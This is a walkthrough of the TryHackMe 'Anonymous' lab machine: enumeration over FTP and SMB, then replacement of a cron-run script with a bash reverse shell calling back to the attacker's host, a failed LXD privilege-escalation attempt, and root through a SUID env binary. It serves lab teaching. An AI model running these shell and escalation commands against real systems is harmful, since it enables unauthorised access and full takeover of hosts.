Anonymous — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Anonymous — TryHackMe — WriteUp. Check it out!

First, deploy the machine and run nmap to find the open ports:

nmap -A -T4 -v <ip>

As you can see, four ports are open: FTP (21), SSH (22) and SMB (139 and 445). Since the FTP server allows anonymous login, let's try that first.

ftp <ip>

There are three files in the scripts folder. Download all of them with mget so we can read them locally (type prompt first to turn off the per-file confirmation):

mget *

Now let's check the content of those files. todo.txt holds nothing valuable except a reminder to disable anonymous FTP login, so the admin already knows this share is exposed. cleanup.sh deletes the files in /tmp_files and writes the result to removed_files.log. A housekeeping script like that is usually run from a cron job, and if the scripts directory turns out to be writable over anonymous FTP, whoever can edit cleanup.sh controls what that cron job executes. Keep that in mind.

Next, use smbclient to list the SMB shares:

smbclient -L <ip>

*Just press Enter when it prompts for a password (null session).

There is a share called “pics”. Let's see what's inside it:

smbclient //<ip>/pics

Then run dir to list the files and mget * to download them all to our machine.

There are two photos, so likely some data is hidden inside them. Let's try the usual metadata and steganography tools: exiftool, binwalk, steghide, stegcracker.

*If StegCracker isn't installed by default on your machine, get it from:
https://github.com/Paradoxis/StegCracker
(the project is no longer maintained and its README points to stegseek as the replacement).

However, after a long wait, I couldn't get any data out of the images.

Let's go back to the FTP. As I said above, cleanup.sh is probably run by a cron job. If the scripts directory is writable, we can replace the content of cleanup.sh with a reverse shell, upload it over the original, and the next cron run gives us a shell as whichever user cron runs the script as.

Run this command to overwrite our local cleanup.sh with a reverse shell one-liner (this is bash syntax, so it relies on the script being executed by bash):

echo "bash -i >& /dev/tcp/<host-ip>/4444 0>&1" > cleanup.sh

Then log in to FTP again as anonymous, cd to scripts and use put to overwrite the original cleanup.sh with ours:

put cleanup.sh cleanup.sh

As you can see, cleanup.sh has been replaced with the reverse shell command.

Now start a listener on our machine:

nc -lvnp 4444

*Note that you can prepend rlwrap to the nc command so that arrow keys and command history work in the shell.

Once the cron job fires, you will have the shell:

Get our first flag:

Now let's get root. As you can see from the id command, namelessone is in the lxd group. LXD is a Linux container manager (similar in spirit to Docker); members of the lxd group can talk to its socket without restriction, which is well known to be equivalent to root on the host, so this misconfiguration can be used to escalate.

After doing some research, I found this link. Follow the instructions step by step to get root:

https://www.hackingarticles.in/lxd-privilege-escalation/#:~:text=A%20member%20of%20the%20local,with%20the%20LXD%20snap%20package

First, on your own machine, clone the Alpine image builder and build the image (the build script needs root):

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

After the build finishes you will see a .tar.gz file. Note its name, because you will use it from now on. Do not copy my file name; it will differ on each machine.

Now start an HTTP server in the folder containing your .tar.gz file in order to transfer it to the victim machine:

python3 -m http.server 9000

or if you use python 2:

python -m SimpleHTTPServer 9000

On the victim machine, cd to /tmp (it is world-writable, so our user can write there) and use wget to fetch the .tar.gz file:

wget http://<host-ip>:9000/your-alpine-filename.tar.gz

The .tar.gz file has been transferred successfully.

Now run:

lxc image import ./your-alpine-file-name.tar.gz --alias myimage

Run lxc image list to make sure the image has been imported:

“myimage” has been imported successfully.

Now run this command to create a privileged container from our image (security.privileged=true is what makes root inside the container root on the host):

lxc init myimage ignite -c security.privileged=true

Oops, lxc init fails because there is no storage pool, so this route is blocked as-is. (Normally the lxd group's socket access is enough to create one yourself with lxc storage create and hand it to lxc init with -s, but the writeup takes a different path from here.)

Well let’s find another way…

find / -type f -perm -u=s 2>/dev/null

This find lists every file with the SUID bit set, i.e. binaries that run with their owner's privileges instead of the caller's (root's, when root owns them). You can learn more by searching for SUID Linux on Google.
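The find output on a real host is mostly noise, so as an added example (my own script, not from the box) here is a POSIX shell helper that filters the SUID list against a baseline of binaries that are normally setuid on a stock Ubuntu install and prints only the unusual ones, which are the candidates worth a GTFOBins lookup. The baseline is an assumption for the example and not an authoritative list, and the sample input is constructed to look like what find returns on a box like this one; the live find pipeline is commented out.

```shell
#!/bin/sh
# Added example: triage SUID binaries against a baseline of expected ones.
# BASELINE is an assumption (typical stock Ubuntu SUID set), not authoritative.

BASELINE="/usr/bin/sudo /usr/bin/passwd /usr/bin/chsh /usr/bin/chfn
/usr/bin/gpasswd /usr/bin/newgrp /usr/bin/su /usr/bin/mount /usr/bin/umount
/usr/bin/fusermount /usr/bin/pkexec /usr/bin/at /usr/bin/traceroute6.iputils
/bin/su /bin/mount /bin/umount /bin/fusermount /bin/ping
/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic"

# Read paths on stdin, print the ones not present in BASELINE.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        found=0
        for known in $BASELINE; do
            if [ "$path" = "$known" ]; then found=1; break; fi
        done
        if [ "$found" -eq 0 ]; then printf '%s\n' "$path"; fi
    done
}

# Live use on the target (commented out so the example runs offline):
# find / -type f -perm -u=s 2>/dev/null | unexpected_suid

# Constructed sample of find output; env is the odd one out
SAMPLE="/usr/bin/passwd
/usr/bin/env
/usr/bin/sudo
/bin/ping
/usr/lib/openssh/ssh-keysign"

printf '%s\n' "$SAMPLE" | unexpected_suid
```

Anything the filter prints is either an admin's custom setuid helper or, as here, a stock binary that somebody chmod'ed 4755; both deserve a look, and GTFOBins tells you in one line whether the binary hands over a shell.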

I found an interesting one here: env has the SUID bit set. env simply executes the program you name, so a root-owned SUID env will run bash as root; the -p flag stops bash from dropping the effective uid back to our own. Run this to spawn a root shell:

/usr/bin/env /bin/bash -p

As you can see, now I’m in the root group! Get the root.txt flag.

**Maybe many of you will ask why I didn't delete the “lxd” part, as it wasn't successful. I won't, because I want to show you that in real black-box pentesting we don't know the exact way to exploit the victim machine in advance. We need to try various ways again and again. Moreover, the “lxd” method couldn't be used this time, but maybe it will work on another machine! So learning is never redundant.

The end.

HAPPY HACKING

I’m Groot